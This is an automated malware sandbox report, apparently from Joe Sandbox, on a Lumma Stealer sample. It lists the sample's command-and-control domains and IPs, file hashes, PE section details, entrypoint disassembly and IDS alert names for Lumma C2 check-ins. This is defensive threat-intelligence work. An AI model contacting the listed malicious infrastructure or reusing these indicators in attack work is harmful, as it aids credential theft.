                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.21.53.8
                            sergei-esenin.comUnited States
                            13335CLOUDFLARENETUStrue
                            104.102.49.254
                            steamcommunity.comUnited States
                            16625AKAMAI-ASUStrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1533037
                            Start date and time:2024-10-14 11:02:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 51s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@2/5@10/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 52.182.143.212
                            • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            05:03:11API Interceptor3x Sleep call for process: file.exe modified
                            06:16:57API Interceptor1x Sleep call for process: WerFault.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.21.53.8Verus.exeGet hashmaliciousLummaCBrowse
                              Executor.exeGet hashmaliciousLummaCBrowse
                                Solara.exeGet hashmaliciousLummaCBrowse
                                  file.exeGet hashmaliciousLummaCBrowse
                                    SoftWare.exeGet hashmaliciousLummaCBrowse
                                      SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                        file.exeGet hashmaliciousLummaCBrowse
                                          SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                            file.exeGet hashmaliciousLummaCBrowse
                                              file.exeGet hashmaliciousLummaCBrowse
                                                104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                • www.valvesoftware.com/legal.htm
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                sergei-esenin.comVerus.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.206.204
                                                Executor.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                Solara.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.206.204
                                                SoftWare.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                SoftWare.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.206.204
                                                SoftWare(2).exeGet hashmaliciousLummaCBrowse
                                                • 172.67.206.204
                                                SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                steamcommunity.comloader.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                Verus.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                Executor.exeGet hashmaliciousLummaCBrowse
                                                • 23.197.127.21
                                                Solara.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                SoftWare.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUShttp://puzzlewood.netGet hashmaliciousUnknownBrowse
                                                • 104.26.7.189
                                                http://www.umb-re.comGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                na.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 104.23.26.35
                                                https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=selin.basaran@digiturk.com.trGet hashmaliciousUnknownBrowse
                                                • 104.21.29.214
                                                https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                                                • 104.17.25.14
                                                https://7suexjabb.cc.rs6.net/tn.jsp?f=001xE8SRwhigmS1t9Q8hharXEkJMtvyfHXyEtdChqRiKNIU6tHdVYZrXGoe4i5Oj7rJImD0z9FA9Z7Ns4_zzose6K4lQVeh2_tGOuTiXbWZeuXhaxX7ZExtB4Td1A03nBtQqSZ5QuAnpfceJlaAlK8LlVk_IFIQFC0HoZlDVtfYJ4608JDpqDknb8nuq6XfWPT8zPJXPlvUq6JBwLgT2V2rRco8OpMRVpBWXlDFx7Wa6-JLGG4j0T_z6-voVUEFkiL1LCMiOTeo2QIvK4QEL2LvJxl710RO4fN0VaMWVH9l6y0is4HN5Cx1Qqzl3DAZvvAuiLje330c-f-GdQOY-XTh1y0wrZR-jvtH8jZkGl5Vm4F_UxI-aORgSa4SEUcwRQ9lSV5NXig_pDFPkhWhUs1rJDroriPBbNmNa_eacU5P8HamXhTNKnvtjdOfUUzwPzxuQ12d4wDOvzs=&c=UsjVlbhyxWUzaXBilvRA7ixl0RUEg9wKLi4E_LzFtdA_im3u-L0cAA==&ch=uLTh3SIB3Q3_uex37lbJeSd4Xs7ZrX-qKnWJPNBj-ulohMTWcqn3qg==Get hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                loader.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.140.193
                                                https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=pucom@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                                                • 104.18.11.207
                                                Verus.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.140.193
                                                Snvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.96.3
                                                AKAMAI-ASUSna.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 104.108.49.254
                                                na.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 23.197.217.29
                                                loader.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                Verus.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                Solara.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.102.49.254
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                a0e9f5d64349fb13191bc781f81f42e1loader.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                Verus.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                Executor.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                Solara.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                SoftWare.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                • 104.102.49.254
                                                No context
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.5816726361411275
                                                Encrypted:false
                                                SSDEEP:96:PEikZF9cTKwvcsQhMov7JfqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAjf/VH:P4Z0GwvcD0WbkQzuiFTZ24IO8b2
                                                MD5:D0CEB8DE5EFF36C5A5800CECF7BE550F
                                                SHA1:74AA7EE99A218F6E607B21F9886497BF44E79333
                                                SHA-256:D4A7CEBFBE98CD684415F22BF1AE501584AF09C055039CACBF37DD05E7A82D73
                                                SHA-512:2091319DAF1DBD3D3B2D362C99132210C6A1517A3B166D766D39BEB9A96C6F5553948E9E18A37571F4CF771A58F50E6C39FAA2C2811FEE6A6F249FE0C8C0F837
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.7.0.1.9.6.6.9.9.9.4.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.7.0.2.0.0.9.1.8.7.0.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.a.1.3.b.9.5.-.4.b.9.d.-.4.8.c.6.-.9.f.2.1.-.7.6.2.4.c.8.9.f.6.6.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.f.b.2.6.7.c.-.2.4.0.0.-.4.0.5.9.-.8.4.7.7.-.3.1.d.e.9.0.c.a.4.0.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.8.-.0.0.0.1.-.0.0.1.4.-.a.f.d.6.-.0.5.e.4.1.7.1.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.5.0.a.3.2.5.3.1.b.0.9.0.9.9.c.a.a.4.7.c.e.3.1.7.a.8.9.c.4.d.d.3.8.b.0.a.7.f.2.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8316
                                                Entropy (8bit):3.6842295844188437
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJRCv6g6YNtSUepgmfh9pr789b6EsfS+m:R6lXJ06g6Y3SUepgmfh863fy
                                                MD5:B2D2A676DDFE8300D1ECA7335EA81456
                                                SHA1:36DDF276FDE54159D03A331316E3A3EA4068A2D6
                                                SHA-256:2D9971C71C4DE8B36074D00D89CF8D0BA1C19EAF68524266FD5A444D8F059346
                                                SHA-512:8EA5132E45C96FA9445CDB6E9E00C12E99DFFDA0C4FFB7E5C492CB354BF74F09BCE132987CCDD82AEC3215D5789B80B2D2B6EDBBE148D039E63109BABD826970
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.7.6.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4571
                                                Entropy (8bit):4.4416444986680865
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsXJg77aI9rwWpW8VYoYm8M4JTEFBV+q8aGcMe3d:uIjf5I7NJ7V8JeMcMe3d
                                                MD5:378437355F2AF79E72F3C2F282044FFF
                                                SHA1:A70FA4178D6C3D088003B0384497B45F0BC3D070
                                                SHA-256:139F753BBECD14C381BBD621C198DC2D1FA771F0740FAD0ECB222F648C6EA0A2
                                                SHA-512:A4CAC20D9A3ABCD5DDA7C61578581C3F55B3E0D9D9E8411EC942F0E43730268F27E6A4D670DC10C015B24F8728040F69C455E2174D6114B85C4AF32E98CE868E
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542886" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4790
                                                Entropy (8bit):3.2536549940520088
                                                Encrypted:false
                                                SSDEEP:96:pwpIilkXkkXwkynEuWy0QT0QV0Qgk0QXJ0Q00Q+MEFgbXTaszeuzSzbxGQI5lmcW:pAlR+u+9SoeyOkNa
                                                MD5:8D6D2B4A89242331E92918509670EBF0
                                                SHA1:4323D589AA0339ECCAE03E3F50EF043E822CE2AA
                                                SHA-256:BA55A8BB1AF769A63229D0C16C87CB9B5B202FA7947395FF92DB1CC2B93DB131
                                                SHA-512:600A61E391ABEB5C63239522214B412D965917B7CBA8D26C502148E60C7CE907ABD8376C77FDBAE27AE407376D10FD300DE40B93B1282B0FF3AC7FEBFCA44A44
                                                Malicious:false
                                                Reputation:low
                                                Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .6.9.8.2.4. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .4.6.0.3.4. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .3.6. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .2.9.9.5.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .4.3.8.1.2.4.9.6. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . .
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.416520369791879
                                                Encrypted:false
                                                SSDEEP:6144:ncifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:ci58oSWIZBk2MM6AFBqo
                                                MD5:B905ABDE3599324528DA12F01E7E6884
                                                SHA1:6B063B648782C8050673776C809D319DE864916A
                                                SHA-256:BC394E2585165F6E5B89A0790D3950602E5A99C33B4D84A80D84305A3BBFE1A8
                                                SHA-512:CCF047C2C8D5D5BB5341936A44B33BD20C7E8E5A75C8AC158B89409E3AECEABF07B72DB8614D13053EA1F31677C416280F90504EBD85D706B916FFE13F79D364
                                                Malicious:false
                                                Reputation:low
                                                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.78.................................................................................................................................................................................................................................................................................................................................................C./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.529077850939505
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:file.exe
                                                File size:2'963'456 bytes
                                                MD5:b7c6caceb7f0ff55a6d276ef2d4505af
                                                SHA1:b50a32531b09099caa47ce317a89c4dd38b0a7f2
                                                SHA256:8c67a0c7241778a14e218933a14a80797a45fca028aff527b42b2f6192a68387
                                                SHA512:0393058da2a88f4d3c23d32277f6366b4fc68dd873c887b4d006057022ec9e087f4be3091b11a6befc88633395634a17f5105e7bf36dfa1d22026cdde967720d
                                                SSDEEP:49152:St1I257awrRSvE/kJDZ096+OFxkokD86Wo2ILiTYWvXtZop+/s+bv:XE7awrRWE/kJDZ096+OPMD8X6LiTTPtT
                                                TLSH:0CD54CAAB50972CFE48F27B89017CD42595D06F94B104CCB982D78BABDA3CC53DB6C25
                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................0...........@...........................0.....%.....@.................................W...k..
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x70b000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                Instruction
                                                jmp 00007F72B996AAAAh
                                                movhps xmm5, qword ptr [00000000h]
                                                add cl, ch
                                                add byte ptr [eax], ah
                                                add byte ptr [eax], al
                                                add byte ptr [0000000Ah], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add bh, bh
                                                inc dword ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx], cl
                                                add byte ptr [eax], 00000000h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add eax, 0000000Ah
                                                add byte ptr [eax], al
                                                add byte ptr [eax], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax+00000000h], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx], al
                                                add byte ptr [eax], 00000000h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add eax, 0000000Ah
                                                add byte ptr [eax], al
                                                add byte ptr [eax], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add al, byte ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], cl
                                                add byte ptr [eax], 00000000h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add eax, 0000000Ah
                                                add byte ptr [eax], al
                                                add byte ptr [eax], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add bh, bh
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                0x10000x5d0000x25e005cb7bdb4555f93ed9b313a8f06afe31dFalse0.9995423370462047data7.982810470141253IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                dobewrry0x600000x2aa0000x2aa0004bca492f5f747e9da5cf90f79eb0a86dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                uiaqfnoj0x30a0000x10000x6005317057dba8c33b33f30e77648facfc5False0.5950520833333334data5.112084333461452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .taggant0x30b0000x30000x2200be09b864d4d9c02a450786a62f45860fFalse0.0857077205882353DOS executable (COM)1.0537364740183492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                DLLImport
                                                kernel32.dlllstrcpy
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-14T11:03:11.568759+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.7556651.1.1.153UDP
                                                2024-10-14T11:03:11.616617+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.7504821.1.1.153UDP
                                                2024-10-14T11:03:11.628627+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.7610341.1.1.153UDP
                                                2024-10-14T11:03:11.640630+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.7520011.1.1.153UDP
                                                2024-10-14T11:03:11.653259+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.7572361.1.1.153UDP
                                                2024-10-14T11:03:11.668185+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.7515621.1.1.153UDP
                                                2024-10-14T11:03:11.686786+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.7639751.1.1.153UDP
                                                2024-10-14T11:03:11.800129+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.7516541.1.1.153UDP
                                                2024-10-14T11:03:13.680682+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.749699104.102.49.254443TCP
                                                2024-10-14T11:03:14.459626+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749701104.21.53.8443TCP
                                                2024-10-14T11:03:14.459626+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701104.21.53.8443TCP
                                                2024-10-14T11:03:15.541991+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749707104.21.53.8443TCP
                                                2024-10-14T11:03:15.541991+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749707104.21.53.8443TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 14, 2024 11:03:11.925088882 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:11.925138950 CEST44349699104.102.49.254192.168.2.7
